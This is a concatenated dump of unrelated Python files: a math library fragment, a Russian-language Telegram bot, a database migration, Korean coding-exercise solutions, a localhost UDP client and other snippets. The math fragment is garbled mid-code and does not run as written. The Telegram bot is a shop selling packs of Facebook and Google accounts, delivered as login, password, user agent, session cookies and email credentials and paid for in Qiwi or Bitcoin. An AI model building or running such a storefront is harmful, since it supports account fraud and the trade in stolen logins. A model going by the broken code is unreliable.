v[3] else ' real')\r\n return res\r\n\r\nclass MathObject(type):\r\n def __new__(self, name, bases, namespace):\r\n for o, n, func in [(\"+\", \"__add__\", __add__), (\"-\", \"__sub__\", __sub__), (\"*\", \"__mul__\", __mul__), (\"/\", \"__truediv__\", __truediv__), (\"**\", \"__pow__\", __pow__)]:\r\n if n in namespace:\r\n x, f=namespace[n](), copy(func)\r\n namespace[n]=lambda x1, x2, o=o: x[1](x1.func+[o, x2.func]) if type(x2)==x[0] else f(x1, x2)\r\n else:\r\n namespace[n]=copy(func)\r\n if \"__iter__\" in namespace:\r\n namespace[\"iter\"]=namespace[\"__iter__\"]()\r\n namespace.update({\"get\": lambda self, *args, edit=False, **kwargs: type(self)(get(self, args, edit, kwargs)), \"show\": show, \"__iter__\": to_list, \"to_list\": to_list, \"__neg__\": __neg__})\r\n if not \"__str__\" in namespace:\r\n namespace[\"__str__\"]=to_str\r\n else:\r\n n=namespace[\"__str__\"]\r\n namespace[\"__str__\"]=lambda x: n(x, to_str(x))\r\n return super().__new__(self, name, bases, namespace)\r\n \r\n def __call__(self, func=None, arg=None, **kwargs):\r\n new_instance = super(MathObject, self).__call__()\r\n new_instance.type=kwargs if arg==None else arg\r\n new_instance.func=func if type(func)==list else compile_text(func) if type(func)==str else [func]\r\n if hasattr(new_instance, \"__arg__\"):\r\n func=get(new_instance, kwargs=new_instance.__arg__())\r\n new_instance.func=func if type(func)==list else compile_text(func) if type(func)==str else [func]\r\n if hasattr(new_instance, \"iter\"):\r\n new_instance.func=[new_instance.iter[0](f) for f in func[:new_instance.iter[1]]]\r\n return new_instance\r\n\r\n\r\nclass Num(metaclass=MathObject):\r\n pass\r\n\r\ndef summa(d:int, u:int, n:Num):\r\n res=0\r\n for x in range(d, u+1):\r\n res+=n.get(x)\r\n return res\r\n\r\ndef prod(d:int, u:int, n:Num):\r\n res=1\r\n for x in range(d, u+1):\r\n res*=n.get(x)\r\n return res\r\n\r\ndef factorial(n):\r\n res=1\r\n for x in range(2, n+1):\r\n res*=x\r\n return res\r\n\r\ndef absolute(n):\r\n return -n if n<0 else n\r\n\r\ndef approxequal(num, epsilon):\r\n return num//epsilon*epsilon\r\n\r\n\r\ndef period(a:int, b:int):\r\n cash=[]\r\n while a!=0:\r\n a*=10\r\n cash.append(a//b)\r\n if cash[int(len(cash)/2):]==cash[:int(len(cash)/2)]:\r\n break\r\n a%=b\r\n cash[int(len(cash)/2):]\r\n\r\nclass Time(metaclass=MathObject):\r\n def __str__(self, 
x) -> str:\r\n if x.replace(\".\", \"\").isdigit():\r\n x=float(x)\r\n if x<3600 and 60 str:\r\n return x+\"m/s\"\r\n\r\nclass Metr(metaclass=MathObject):\r\n def __str__(self, x) -> str:\r\n if x.replace(\".\", \"\").isdigit():\r\n x=float(x)\r\n if x<1 and 0.1= 1 and i <= quant and j2 == 1):\n global q\n q = int(text2)\n q = q * rub_sum\n keyboard = types.InlineKeyboardMarkup()\n payqiwi_button = types.InlineKeyboardButton(text=\"оплатить Qiwi\", callback_data=\"payqiwi\")\n paybtc_button = types.InlineKeyboardButton(text=\"оплатить Btc\", callback_data=\"paybtc\")\n mainmenu_button = types.InlineKeyboardButton(text=\"◀️ Главное меню\", callback_data=\"mainmenu\")\n keyboard.row(payqiwi_button, paybtc_button).row(mainmenu_button)\n st = str(\"Итого стоимость:\\n`{0}`руб\\n\\n_Выберите способ оплаты:_\".format(q))\n msg = bot.send_message(chat_id, text=st, reply_markup=keyboard, parse_mode='MarkdownV2')\n else:\n invalid_value(message)\n\n#read number of accounts\ndef read_quantity(id):\n msg = bot.forward_message(chat_id=constant.primary_chat_id, from_chat_id=constant.primary_chat_id, message_id=id)\n bot.delete_message(chat_id=constant.primary_chat_id, message_id=msg.message_id)\n return msg.text\n\n#next step handler, after input quantity fbru50\ndef pay_fbru50(message):\n pay(message, quant_fbru50, constant.fbru50_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity fbua50\ndef pay_fbua50(message):\n pay(message, quant_fbua50, constant.fbua50_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity fbgb250\ndef pay_fbgb250(message):\n pay(message, quant_fbgb250, constant.fbgb250_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity fbusa250\ndef pay_fbusa250(message):\n pay(message, quant_fbusa250, constant.fbusa250_rub_sum, invalid_value_facebook)\n\n#next step handler, after input quantity ggworld\ndef pay_ggworld(message):\n pay(message, quant_ggworld, constant.ggworld_rub_sum, invalid_value_google)\n\n#next step handler, after input quantity ggeu\ndef pay_ggeu(message):\n pay(message, quant_ggeu, constant.ggeu_rub_sum, invalid_value_google)\n\n#next step handler, after input quantity ggusatop\ndef pay_ggusatop(message):\n pay(message, quant_ggusatop, constant.ggusatop_rub_sum, invalid_value_google)\n\n#read list of user IDs\ndef read_user_ids(id):\n msg = bot.forward_message(chat_id=constant.primary_chat_id, from_chat_id=constant.primary_chat_id, message_id=id)\n bot.delete_message(chat_id=constant.primary_chat_id, message_id=msg.message_id)\n return msg.text\n\n#add unique ID\ndef add_new_id(message):\n m = read_user_ids(constant.buyer_IDs)\n j = \"\"\n n = 0\n new_id = str(message.chat.id)\n for i in m:\n if (i != \",\"):\n j = j + i\n else:\n if (j == new_id):\n n = n + 1\n break\n j = \"\"\n if n == 0:\n m = m + new_id + \",\"\n bot.edit_message_text(text=m, chat_id=constant.primary_chat_id, message_id=6)\n\n#moscow time\ndef time():\n t1 = str(datetime.now() + timedelta(minutes=180))\n t2 = t1[-15:]\n t2 = t2[:5]\n tf = t2[:2]\n tl = t2[-2:]\n t1 = tf + \"\\:\" + tl\n return t1\n\n#moscow time +30m\ndef time210():\n t1 = str(datetime.now() + timedelta(minutes=210))\n t2 = t1[-15:]\n t2 = t2[:5]\n tf = t2[:2]\n tl = t2[-2:]\n t1 = tf + \"\\:\" + tl\n return t1\n\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n add_new_id(message)\n add_replykeyboard(message)\n mainmenu_inline(message)\n\n@bot.message_handler(content_types=['text'])\ndef handle_text(message):\n if message.text == '🔄 Начать 
сначала':\n mainmenu_inline(message)\n\n#inline keyboard\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n #return to main menu\n if call.data == \"mainmenu\":\n mainmenu_inline(call.message)\n\n #select type of accounts\n elif call.data == \"choose\":\n keyboard_choose = types.InlineKeyboardMarkup()\n facebook_button = types.InlineKeyboardButton(text=\"Facebook\", callback_data=\"facebook\")\n google_button = types.InlineKeyboardButton(text=\"Google\", callback_data=\"google\")\n mainmenu_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"mainmenu\")\n keyboard_choose.row(facebook_button, google_button).row(mainmenu_button)\n sst = str(\n \"Выберите тип аккаунтов:\")\n bot.send_message(call.message.chat.id, text=sst, reply_markup=keyboard_choose, parse_mode='MarkdownV2')\n\n #select facebook accounts\n elif call.data == \"facebook\":\n keyboard_facebook = types.InlineKeyboardMarkup(row_width=1)\n st_fbru50 = \"Facebook 🇷🇺RU50$ пак 10шт. = {0}руб\".format(constant.fbru50_rub_sum)\n st_fbua50 = \"Facebook 🇺🇦UA50$ пак 10шт. = {0}руб\".format(constant.fbua50_rub_sum)\n st_fbgb250 = \"Facebook 🇬🇧GB250$ пак 10шт. = {0}руб\".format(constant.fbgb250_rub_sum)\n st_fbusa250 = \"Facebook 🇺🇸USA250$ пак 10шт. = {0}руб\".format(constant.fbusa250_rub_sum)\n fbru50_button = types.InlineKeyboardButton(text=st_fbru50,\n callback_data=\"fbru50\")\n fbua50_button = types.InlineKeyboardButton(text=st_fbua50,\n callback_data=\" fbua50\")\n fbgb250_button = types.InlineKeyboardButton(text=st_fbgb250,\n callback_data=\"fbgb250\")\n fbusa250_button = types.InlineKeyboardButton(text=st_fbusa250,\n callback_data=\"fbusa250\")\n choose_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"choose\")\n keyboard_facebook.add(fbru50_button, fbua50_button, fbgb250_button, fbusa250_button, choose_button)\n st = str(\"Выберите аккаунты\\n\\n*Текстовый блок информации об аккаунтах\\n\\nlog:pass:useragent:{json_cookie}:mail:pass\")\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard_facebook)\n\n #select google accounts\n elif call.data == \"google\":\n keyboard_facebook = types.InlineKeyboardMarkup(row_width=1)\n st_ggworld = \"Google 🌏World пак 10шт. = {0}руб\".format(constant.ggworld_rub_sum)\n st_ggeu = \"Google 🇪🇺EU пак 10шт. = {0}руб\".format(constant.ggeu_rub_sum)\n st_ggusatop = \"Google 🇺🇸USA top пак 10шт. 
= {0}руб\".format(constant.ggusatop_rub_sum)\n ggworld_button = types.InlineKeyboardButton(text=st_ggworld, callback_data=\"ggworld\")\n ggeu_button = types.InlineKeyboardButton(text=st_ggeu, callback_data=\"ggeu\")\n ggusatop_button = types.InlineKeyboardButton(text=st_ggusatop,\n callback_data=\"ggusatop\")\n choose_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"choose\")\n keyboard_facebook.add(ggworld_button, ggeu_button, ggusatop_button, choose_button)\n st = str(\"Выберите аккаунты\\n\\n*Текстовый блок информации об аккаунтах\\n\\n*Описание особеноостей аккаунтов\")\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard_facebook)\n\n #payment qiwi\n elif call.data == \"payqiwi\":\n a = random.randint(1000000, 9999999)\n idname = call.message.chat.id\n #payment comment\n com = \"id:\" + str(idname) + \":\" + str(a)\n t180 = time()\n t210 = time210()\n qiw_url = str(\n \"https://qiwi.com/payment/form/99?extra['account']={0}&amountInteger={2}&amountFraction=0&extra['comment']={1}&blocked[0]=account&blocked[1]=sum&blocked[2]=comment\".format(\n constant.qiw_tel, com, q))\n qiw_keyboard = types.InlineKeyboardMarkup()\n qiw_pay_button = types.InlineKeyboardButton(text=\"Оплатить\", url=qiw_url)\n manager_button = types.InlineKeyboardButton(text='Менеджер', url=constant.support_name)\n qiw_back_button = types.InlineKeyboardButton(text=\"⏹ Отмена(Главное меню)\", callback_data=\"mainmenu\")\n qiw_keyboard.row(qiw_pay_button).row(manager_button).row(qiw_back_button)\n strqiwi = \"_\\-Меню оплаты\\-_\\n\\nПереведите `{3}`руб на Qiwi\\-кошелек:\\n`{1}`\\nукажите комментарий:\\n`{0}`\\n\" \\\n \"_Либо нажмите кнопу [Оплатить]({2}) \\(Данные будут заполнены автоматически\\)_ \\n\\n\".format(\n com, constant.qiw_tel, qiw_url, q)\n strqiwi2 = \"Оплатите в течении 30 минут\\nдо `{0}`по МСК\\ncейчас `{1}` по МСК\\n\\n_\\(После оплаты отпишите менеджеру, переслав это сообщение\\)_\".format(t210, t180)\n strqiwi3 = strqiwi + strqiwi2\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=strqiwi3,\n reply_markup=qiw_keyboard, parse_mode='MarkdownV2')\n\n #payment bitcoin\n elif call.data == \"paybtc\":\n #crypto exchange public api\n url = 'https://yobit.net/api/2/btc_rur/ticker'\n response = requests.get(url).json()\n #json response parse\n price = response['ticker']['sell']\n a = (1 / price) * q\n a = round(a, 8)\n text = str(a)\n t180 = time()\n t210 = time210()\n keyboard = types.InlineKeyboardMarkup()\n manager_button = types.InlineKeyboardButton(text='Менеджер', url=constant.support_name)\n btc_back_button = types.InlineKeyboardButton(text=\"⏹ Отмена(Главное меню)\", callback_data=\"mainmenu\")\n keyboard.row(manager_button).row(btc_back_button)\n st = \"_\\-Меню оплаты\\-_\\n\\nПереведите:`\\n{1}`btc\\nНа кошелек:\\n`{4}`\\n\\nСовершите платеж\" \\\n \" в течении 30 минут\\nдо `{2}`по МСК\\ncейчас `{3}` по МСК\\n\\nПосле пополнения отпишите [Менеджеру]({0}),\" \\\n \" переслав это сообщение\".format(\n constant.support_name, a, t210, t180, constant.btc_wlt)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard, parse_mode='MarkdownV2')\n\n elif call.data == \"info\":\n keyboard_personal = types.InlineKeyboardMarkup()\n mainmenu_button = types.InlineKeyboardButton(text=\"◀️ Назад\", callback_data=\"mainmenu\")\n support_button = types.InlineKeyboardButton(text='Поддержка', 
url=constant.support_name)\n keyboard_personal.row(mainmenu_button, support_button)\n st = str(\"Информация об аккаунте {2} {3}\\n\\nID - {0}\\nusername - @{1}\".format(\n call.message.chat.id, call.message.chat.username, call.message.chat.first_name,\n call.message.chat.last_name))\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n reply_markup=keyboard_personal)\n\n\n elif call.data == \"faq\":\n st1 = \"Выберите _Аккаунты_\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st2 = \"Выберите нужную позицию\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st3 = \"Укажите количество\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st4 = \"Выберите _Пополнить Qiwi_ или _BTC_\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st5 = \"Выберите _Оплатить_, либо совершите перевод самостоятельно, указав в переводе комментарий\\. 
Для отмены выберите _Отменить оплату_\\.\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st6 = \"Пополните указанный Btc\\-кошелек, на указанную сумму\\.\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n st7 = \"После проведения оплаты напишите менеджеру, переслав сообщение \\-Меню Оплаты\\-\" \\\n \"\\n\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\" \\\n \"\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\\-\"\n try:\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img1, caption=st1, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img2, caption=st2, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img3, caption=st3, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img4, caption=st4, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img5, caption=st5, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img6, caption=st6, parse_mode='MarkdownV2')\n bot.send_photo(chat_id=call.message.chat.id, photo=constant.img7, caption=st7, parse_mode='MarkdownV2')\n except Exception:\n pass\n mainmenu_inline(call.message)\n\n #input quantity of fbru50\n elif call.data == \"fbru50\":\n global quant_fbru50\n quant_fbru50 = read_quantity(constant.fbru50)\n st = \"_Facebook 🇷🇺RU50$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbru50, constant.fbru50_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbru50)\n\n #input quantity of fbua50\n elif call.data == \"fbua50\":\n global quant_fbua50\n quant_fbua50 = read_quantity(constant.fbua50)\n st = \"_Facebook 🇺🇦UA50$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbua50, constant.fbua50_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbua50)\n\n #input quantity of fbgb250\n elif call.data == \"fbgb250\":\n global quant_fbgb250\n quant_fbgb250 = read_quantity(constant.fbgb250)\n st = \"_Facebook 🇬🇧GB250$ пак 10шт\\. 
\\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbgb250, constant.fbgb250_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbgb250)\n\n #input quantity of fbusa250\n elif call.data == \"fbusa250\":\n global quant_fbusa250\n quant_fbusa250 = read_quantity(constant.fbusa250)\n st = \"_Facebook 🇺🇸USA250$ пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_fbusa250, constant.fbusa250_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_fbusa250)\n\n #input quantity of ggworld\n elif call.data == \"ggworld\":\n global quant_ggworld\n quant_ggworld = read_quantity(constant.ggworld)\n st = \"_Google 🌏World пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_ggworld, constant.ggworld_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_ggworld)\n\n #input quantity of ggeu\n elif call.data == \"ggeu\":\n global quant_ggeu\n quant_ggeu = read_quantity(constant.ggeu)\n st = \"_Google 🇪🇺EU пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_ggeu, constant.ggeu_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_ggeu)\n\n #input quantity of ggusatop\n elif call.data == \"ggusatop\":\n global quant_ggusatop\n quant_ggusatop = read_quantity(constant.ggusatop)\n st = \"_Google 🇺🇸USA пак 10шт\\. \\= {1}руб_\\.\\n\\nОсталось \\- `{0}` пак\\(ов\\)\" \\\n \" \\n\\nВведите кол\\-во пакетов аккаунтов, которое вы хотите приобрести \\(от `1` до `{0}`\\)\".format(quant_ggusatop, constant.ggusatop_rub_sum)\n msg = bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=st,\n parse_mode='MarkdownV2')\n bot.register_next_step_handler(msg, pay_ggusatop)\n\nbot.polling(none_stop=True, interval=0)","repo_name":"Galimovar/Account_store_bot-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24374,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"15179254527","text":"\"\"\"empty message\n\nRevision ID: 4e9ad19c3e2e\nRevises: 37875abb00c7\nCreate Date: 2019-04-28 12:47:22.223513\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4e9ad19c3e2e'\ndown_revision = '37875abb00c7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('attachments_votes',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('attachment_id', sa.Integer(), nullable=False),\n sa.Column('vote', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['attachment_id'], ['attachments.id'], name='attachments_votes__attachment__fk', ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], name='attachments_votes__user__fk'),\n sa.PrimaryKeyConstraint('user_id', 'attachment_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('attachments_votes')\n # ### end Alembic commands ###\n","repo_name":"aimanow/sft","sub_path":"src/backend/database/migrations/versions/4e9ad19c3e2e_.py","file_name":"4e9ad19c3e2e_.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30844082238","text":"# 정수 배열 A 와 B가 있다. A는 총 n개의 서로 다른 양의 정수를 포함하고 B는 총 m개의 서로 다른 양의 정수를 포함한다.\n\n# A, B를 이용해서 길이가 n인 새로운 배열 C를 만들어보자.\n\n# C[i] 는 배열 B에 있는 값 중 A[i] 에 가장 가까운 값 (절대값 차이가 가장 작은 값)으로 정의 된다. \n# 만약 이 조건을 만족하는 값들이 여럿 있는 경우, 그 중 가장 크기가 작은 값으로 정의 된다.\n# 예를 들어 A = [20, 5, 14, 9] 그리고 B = [16, 8, 12] 라고 해보자.\n\n# C[1] = 16 이다 - 왜냐하면 B[1] = 16이 A[1] = 20에 가장 가깝기 때문이다.\n# C[2] = 8 이다 - 왜냐하면 B[2] = 8이 A[2] = 5에 가장 가깝기 때문이다.\n# C[3] = 12 이다 - 왜냐하면 B[1] = 16 와 B[3] = 12 모두 A[3] = 14에 가장 가깝지만, B[3]의 값이 더 작기 때문이다.\n# C[4] = 8이다.\n# 이 예제의 경우 C = [16, 8, 12, 8]으로 정의된다.\n\n# 두 배열 A와 B가 주어졌을 때, 새로운 배열 C를 계산하여 배열 C에 포함된 값들의 합을 구하는 프로그램을 작성하시오.\n\nimport sys\n\nT = int(sys.stdin.readline())\n\nfor _ in range(T):\n a,b = map(int,sys.stdin.readline().split())\n A = list(map(int,sys.stdin.readline().split()))\n B = list(map(int,sys.stdin.readline().split()))\n B.sort()\n ans = 0\n for i in A:\n num = i\n st = 0\n ed = b-1\n while True:\n if st >= ed:\n break\n mid = (st+ed)//2\n if B[mid] <= num:\n st = mid+1\n else:\n ed = mid\n if st != 0 and B[st] - num >= num - B[st-1]:\n ans += B[st-1]\n else:\n ans += B[st]\n print(ans)","repo_name":"kysuk05/BJO_algo","sub_path":"실버/BJO17124.py","file_name":"BJO17124.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24958986319","text":"## UDP Client\nimport socket\n\ntarget_host = \"127.0.0.1\"\ntarget_port = 9997\n\n# creates a socket object\n# AF_INET = indicates we’ll use a standard IPv4 address\n# SOCK_DGRAM = indicates that this will be a UDP client\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# sends data\nclient.sendto(b\"AAABBBCCC\",(target_host, target_port))\n\n# receives data\ndata, addr = client.recvfrom(4096)\n\nprint(data.decode())\nclient.close()","repo_name":"christinec-dev/Python_Clients","sub_path":"udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12130941143","text":"# [프로그래머스] 구명보트\nfrom collections import deque\ndef solution(people, limit):\n answer = 0\n # 가장 큰 놈을 먼저 넣는다.\n # 그 다음부터는 넣을 수 있는 놈 중 가장 큰놈을 넣는다.\n people.sort(reverse=True)\n que = (people)\n print(people)\n inBoat = []\n weight = 0\n while que != []:\n # 남은 놈들 curQue에 넣는다.\n curQue = list(que)\n # 2명만 탈 수 있다는 조건 나중에 봄.\n if len(inBoat)==2:\n answer += 1\n inBoat = []\n weight = 0\n for i in range(len(curQue)):\n 
flagAdd = False\n # 큰 놈 부터 본다.\n # 들어갈 수 있으면 넣고 break\n # 끝까지 봤는데 넣을 수 없으면 보트 출발.\n if weight + curQue[i] <= limit:\n # 들어갈 수 있으면 넣고 que에서 빼주고\n inBoat.append(curQue[i])\n weight += curQue[i]\n que.remove(curQue[i])\n flagAdd = True\n break\n if not flagAdd:\n answer += 1\n inBoat = []\n weight = 0\n print(answer + 1)\n return answer + 1\n\n\npeople = [40,40,50,60,70,120,130,140,240]\n\nlimit = 240\nsolution(people,limit)\n\n# 3명도 탈 수 있는 건 줄 알고 이렇게 짰다.\n# 하지만 2명까지만 탈 수 있음. 그래서 2명 조건을 추가한다해도 시간초과뜸\n","repo_name":"devgin23/masterCote","sub_path":"Programmers/savingBoat.py","file_name":"savingBoat.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"72783917631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 13:12:57 2019\n\n@author: Mithilesh\n\"\"\"\n\ndef cupcakes(n,arr):\n arr.sort(reverse=True)\n cal=0\n for j in range(n):\n cal+=(2**j)*arr[j]\n print(cal)\n\nn=int(input())\narr=list(map(int,input().split()))\ncupcakes(n,arr)","repo_name":"abhaykatheria/cp","sub_path":"HackerRank2/Cupcakes.py","file_name":"Cupcakes.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25585202263","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Controller(nn.Module):\n def __init__(self, latents, actions):\n super().__init__()\n self.fc = nn.Linear(latents, actions)\n\n def forward(self, *param):\n inputs = torch.cat(param, dim=1)\n return F.softmax(self.fc(inputs), 1)\n","repo_name":"fuzihang/CSC2542Project","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44274528630","text":"import sys\nimport time\nfrom functools import wraps\n\nfrom app.logger import log\n\n\ndef time_measurement(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n response_size = sys.getsizeof(result.json())\n total_time = end_time - start_time\n log(\n log.INFO,\n \"Function [%s] %s took 